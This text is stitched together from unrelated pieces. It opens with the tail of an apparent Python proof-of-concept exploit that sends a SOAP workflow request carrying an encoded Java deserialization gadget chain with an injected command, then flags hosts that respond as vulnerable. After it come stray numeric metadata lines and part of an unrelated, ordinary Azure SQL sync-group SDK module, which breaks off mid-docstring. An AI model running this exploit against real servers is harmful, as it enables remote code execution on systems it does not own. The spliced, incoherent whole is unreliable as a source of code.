1;&#x76;&#x61;&#x78;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x73;&#x75;&#x6e;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x67;&#x6e;&#x6f;&#x72;&#x65;&#x64;&#x5f;&#x5f;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x72;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x53;&#x79;&#x6e;&#x74;&#x68;&#x65;&#x74;&#x69;&#x63;&#x52;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x74;&#x68;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x2e;&#x3c;&#x2f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;
&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x5f;&#x5f;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x64;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x72;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x65;&#x72;&#x54;&#x6f;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x75;&#x6e;&#x2e;&#x6d;&#x69;&#x73;&#x63;&#x2e;&#x4c;&#x61;&#x75;&#x6e;&#x63;&#x68;&#x65;&#x72;&#x24;&#x45;&#x78;&#x74;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x6f;&#x72;&#x43;&#x4c;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x74;&#x79;&#x70;&#x65;&#x3e;&#x4b;&#x45;&#x59;&#x53;&#x3c;&#x2f;&#x74;&#x79;&#x70;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x6e;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x69;&#x6f;&#x2e;&#x42;&#x79;&#x74;&#x65;&#x41;&#x72;&#x72;&#x61;&#x79;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#
x20;&#x20;&#x20;&#x20;&#x3c;&#x62;&#x75;&#x66;&#x3e;&#x3c;&#x2f;&#x62;&#x75;&#x66;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x6f;&#x73;&#x3e;&#x30;&#x3c;&#x2f;&#x70;&#x6f;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6d;&#x61;&#x72;&#x6b;&#x3e;&#x30;&#x3c;&#x2f;&#x6d;&#x61;&#x72;&#x6b;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x30;&#x3c;&#x2f;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6e;&#x73;&#x75;&#x6d;&#x65;&#x64;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x63;&#x6f;&#x6e;&#x73;&#x75;&#x6d;&#x65;&#x64;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x74;&#x72;&#x61;&#x6e;&#x73;&#x66;&#x65;&#x72;&#x46;&#x6c;&#x61;&#x76;&#x6f;&#x72;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x4c;&#x65;&#x6e;&#x3e;&#x30;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x4c;&#x65;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x4
4;&#x61;&#x74;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;&#x0a;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;</web:string> <web:string>2</web:string> </web:doCreateWorkflowRequest> </soapenv:Body> </soapenv:Envelope>'''.format(cmd=cmd) try: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) r = requests.post(url,headers=headers,data=data,verify=False,timeout=5) if "VulTest" in r.text and r.status_code == 500: result['target'] = target result['poc'] = NAME result['url'] = url return result else: pass except: pass if __name__ == '__main__': target = sys.argv[1] poc(target)
798.703704
41,243
0.502087
7,060
43,130
3.064731
0.023938
0.289227
0.400148
0.490271
0.606692
0.520035
0.502565
0.47844
0.463881
0.449462
0
0.295161
0.008741
43,130
54
41,244
798.703704
0.210933
0.00109
0
0.177778
0
0.066667
0.981746
0.969235
0
0
0
0
0
1
0.022222
false
0.044444
0.066667
0
0.111111
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
1
0
0
0
1
1
1
0
0
0
0
0
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
484f24f337816c4f29b5edd0953b48345f0151ba
47,356
py
Python
src/db-up/azext_db_up/vendored_sdks/azure_mgmt_sql/sql/operations/sync_groups_operations.py
Mannan2812/azure-cli-extensions
e2b34efe23795f6db9c59100534a40f0813c3d95
[ "MIT" ]
207
2017-11-29T06:59:41.000Z
2022-03-31T10:00:53.000Z
src/db-up/azext_db_up/vendored_sdks/azure_mgmt_sql/sql/operations/sync_groups_operations.py
Mannan2812/azure-cli-extensions
e2b34efe23795f6db9c59100534a40f0813c3d95
[ "MIT" ]
4,061
2017-10-27T23:19:56.000Z
2022-03-31T23:18:30.000Z
src/db-up/azext_db_up/vendored_sdks/azure_mgmt_sql/sql/operations/sync_groups_operations.py
Mannan2812/azure-cli-extensions
e2b34efe23795f6db9c59100534a40f0813c3d95
[ "MIT" ]
802
2017-10-11T17:36:26.000Z
2022-03-31T22:24:32.000Z
# coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- import uuid from msrest.pipeline import ClientRawResponse from msrestazure.azure_exceptions import CloudError from msrest.polling import LROPoller, NoPolling from msrestazure.polling.arm_polling import ARMPolling from .. import models class SyncGroupsOperations(object): """SyncGroupsOperations operations. :param client: Client for service requests. :param config: Configuration of service client. :param serializer: An object model serializer. :param deserializer: An object model deserializer. :ivar api_version: The API version to use for the request. Constant value: "2015-05-01-preview". """ models = models def __init__(self, client, config, serializer, deserializer): self._client = client self._serialize = serializer self._deserialize = deserializer self.api_version = "2015-05-01-preview" self.config = config def list_sync_database_ids( self, location_name, custom_headers=None, raw=False, **operation_config): """Gets a collection of sync database ids. :param location_name: The name of the region where the resource is located. :type location_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. 
:return: An iterator like instance of SyncDatabaseIdProperties :rtype: ~azure.mgmt.sql.models.SyncDatabaseIdPropertiesPaged[~azure.mgmt.sql.models.SyncDatabaseIdProperties] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ def internal_paging(next_link=None, raw=False): if not next_link: # Construct URL url = self.list_sync_database_ids.metadata['url'] path_format_arguments = { 'locationName': self._serialize.url("location_name", location_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') else: url = next_link query_parameters = {} # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.get(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp return response # Deserialize response deserialized = models.SyncDatabaseIdPropertiesPaged(internal_paging, self._deserialize.dependencies) if raw: header_dict = {} client_raw_response = models.SyncDatabaseIdPropertiesPaged(internal_paging, self._deserialize.dependencies, header_dict) return client_raw_response return deserialized list_sync_database_ids.metadata = {'url': 
'/subscriptions/{subscriptionId}/providers/Microsoft.Sql/locations/{locationName}/syncDatabaseIds'} def _refresh_hub_schema_initial( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): # Construct URL url = self.refresh_hub_schema.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.post(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200, 202]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response def refresh_hub_schema( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, polling=True, **operation_config): """Refreshes a hub database schema. 
:param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: The poller return type is ClientRawResponse, the direct response alongside the deserialized response :param polling: True for ARMPolling, False for no polling, or a polling object for personal polling strategy :return: An instance of LROPoller that returns None or ClientRawResponse<None> if raw==True :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ raw_result = self._refresh_hub_schema_initial( resource_group_name=resource_group_name, server_name=server_name, database_name=database_name, sync_group_name=sync_group_name, custom_headers=custom_headers, raw=True, **operation_config ) def get_long_running_output(response): if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response lro_delay = operation_config.get( 'long_running_operation_timeout', self.config.long_running_operation_timeout) if polling is True: polling_method = ARMPolling(lro_delay, **operation_config) elif polling is False: polling_method = NoPolling() else: polling_method = polling return LROPoller(self._client, raw_result, get_long_running_output, polling_method) refresh_hub_schema.metadata = {'url': 
'/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}/refreshHubSchema'} def list_hub_schemas( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): """Gets a collection of hub database schemas. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. 
:return: An iterator like instance of SyncFullSchemaProperties :rtype: ~azure.mgmt.sql.models.SyncFullSchemaPropertiesPaged[~azure.mgmt.sql.models.SyncFullSchemaProperties] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ def internal_paging(next_link=None, raw=False): if not next_link: # Construct URL url = self.list_hub_schemas.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') else: url = next_link query_parameters = {} # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.get(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp return response # Deserialize response deserialized = models.SyncFullSchemaPropertiesPaged(internal_paging, self._deserialize.dependencies) if raw: header_dict = {} client_raw_response = 
models.SyncFullSchemaPropertiesPaged(internal_paging, self._deserialize.dependencies, header_dict) return client_raw_response return deserialized list_hub_schemas.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}/hubSchemas'} def list_logs( self, resource_group_name, server_name, database_name, sync_group_name, start_time, end_time, type, continuation_token=None, custom_headers=None, raw=False, **operation_config): """Gets a collection of sync group logs. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param start_time: Get logs generated after this time. :type start_time: str :param end_time: Get logs generated before this time. :type end_time: str :param type: The types of logs to retrieve. Possible values include: 'All', 'Error', 'Warning', 'Success' :type type: str :param continuation_token: The continuation token for this operation. :type continuation_token: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. 
:return: An iterator like instance of SyncGroupLogProperties :rtype: ~azure.mgmt.sql.models.SyncGroupLogPropertiesPaged[~azure.mgmt.sql.models.SyncGroupLogProperties] :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ def internal_paging(next_link=None, raw=False): if not next_link: # Construct URL url = self.list_logs.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['startTime'] = self._serialize.query("start_time", start_time, 'str') query_parameters['endTime'] = self._serialize.query("end_time", end_time, 'str') query_parameters['type'] = self._serialize.query("type", type, 'str') if continuation_token is not None: query_parameters['continuationToken'] = self._serialize.query("continuation_token", continuation_token, 'str') query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') else: url = next_link query_parameters = {} # Construct headers header_parameters = {} header_parameters['Accept'] = 'application/json' if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.get(url, query_parameters, header_parameters) response = 
self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp return response # Deserialize response deserialized = models.SyncGroupLogPropertiesPaged(internal_paging, self._deserialize.dependencies) if raw: header_dict = {} client_raw_response = models.SyncGroupLogPropertiesPaged(internal_paging, self._deserialize.dependencies, header_dict) return client_raw_response return deserialized list_logs.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}/logs'} def cancel_sync( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): """Cancels a sync group synchronization. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. 
:return: None or ClientRawResponse if raw=true :rtype: None or ~msrest.pipeline.ClientRawResponse :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ # Construct URL url = self.cancel_sync.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str') # Construct and send request request = self._client.post(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response cancel_sync.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}/cancelSync'} def trigger_sync( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, 
**operation_config): """Triggers a sync group synchronization. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. :return: None or ClientRawResponse if raw=true :rtype: None or ~msrest.pipeline.ClientRawResponse :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ # Construct URL url = self.trigger_sync.metadata['url'] path_format_arguments = { 'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'), 'serverName': self._serialize.url("server_name", server_name, 'str'), 'databaseName': self._serialize.url("database_name", database_name, 'str'), 'syncGroupName': self._serialize.url("sync_group_name", sync_group_name, 'str'), 'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str') } url = self._client.format_url(url, **path_format_arguments) # Construct parameters query_parameters = {} query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str') # Construct headers header_parameters = {} if self.config.generate_client_request_id: header_parameters['x-ms-client-request-id'] = str(uuid.uuid1()) if custom_headers: header_parameters.update(custom_headers) if self.config.accept_language is not None: header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", 
self.config.accept_language, 'str') # Construct and send request request = self._client.post(url, query_parameters, header_parameters) response = self._client.send(request, stream=False, **operation_config) if response.status_code not in [200]: exp = CloudError(response) exp.request_id = response.headers.get('x-ms-request-id') raise exp if raw: client_raw_response = ClientRawResponse(None, response) return client_raw_response trigger_sync.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/syncGroups/{syncGroupName}/triggerSync'} def get( self, resource_group_name, server_name, database_name, sync_group_name, custom_headers=None, raw=False, **operation_config): """Gets a sync group. :param resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal. :type resource_group_name: str :param server_name: The name of the server. :type server_name: str :param database_name: The name of the database on which the sync group is hosted. :type database_name: str :param sync_group_name: The name of the sync group. :type sync_group_name: str :param dict custom_headers: headers that will be added to the request :param bool raw: returns the direct response alongside the deserialized response :param operation_config: :ref:`Operation configuration overrides<msrest:optionsforoperations>`. 
